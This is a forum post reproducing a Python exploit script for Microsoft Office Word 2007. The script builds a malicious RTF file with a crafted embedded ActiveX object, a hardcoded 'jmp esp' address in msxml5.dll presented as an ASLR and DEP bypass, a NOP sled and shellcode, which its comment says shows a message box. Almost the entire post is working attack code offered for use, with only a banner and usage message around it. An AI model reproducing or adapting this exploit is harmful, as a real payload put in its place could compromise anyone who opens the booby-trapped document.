Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)

Kalashnikov. · March 22, 2015

# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass

# Date : 28/02/2015

# Author : R-73eN

# Software : Microsoft Office Word 2007

# Tested : Windows 7 Starter

import sys

# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .

shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'

#filecontent

content="{\\rtf1"

content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"

content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"

content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"

content+="{\\object\\objocx"

content+="{\\*\\objdata"

content+="\n"

content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"

content+="00000000000000000E0000"

content+="\n"

content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"

content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"

content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"

content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"

content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"

content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"

content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"

content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"

content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"

content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"

content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"

content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"

content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"

content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"

content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"

content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"

content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"

content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"

content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"

content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"

content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"

content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"

content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"

content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"

content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"

content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"

content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"

content+="000000000000"

content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)

content+="9090909090909090" #nops

content+= shellcode

#junk

content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"

content+="00000000000000"

content+="\n"

content+="}"

banner = "\n\n"

banner +=" ___ __ ____ _ _ \n"

banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"

banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"

banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"

banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n"

print banner

if(len(sys.argv) < 2):

print '\n Usage : exploit.py filename.rtf'

else:

filename = sys.argv[1]

f=open(filename,"w")

f.write(content)

f.close()

print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'

Sign In

Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)

Recommended Posts

Kalashnikov.

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages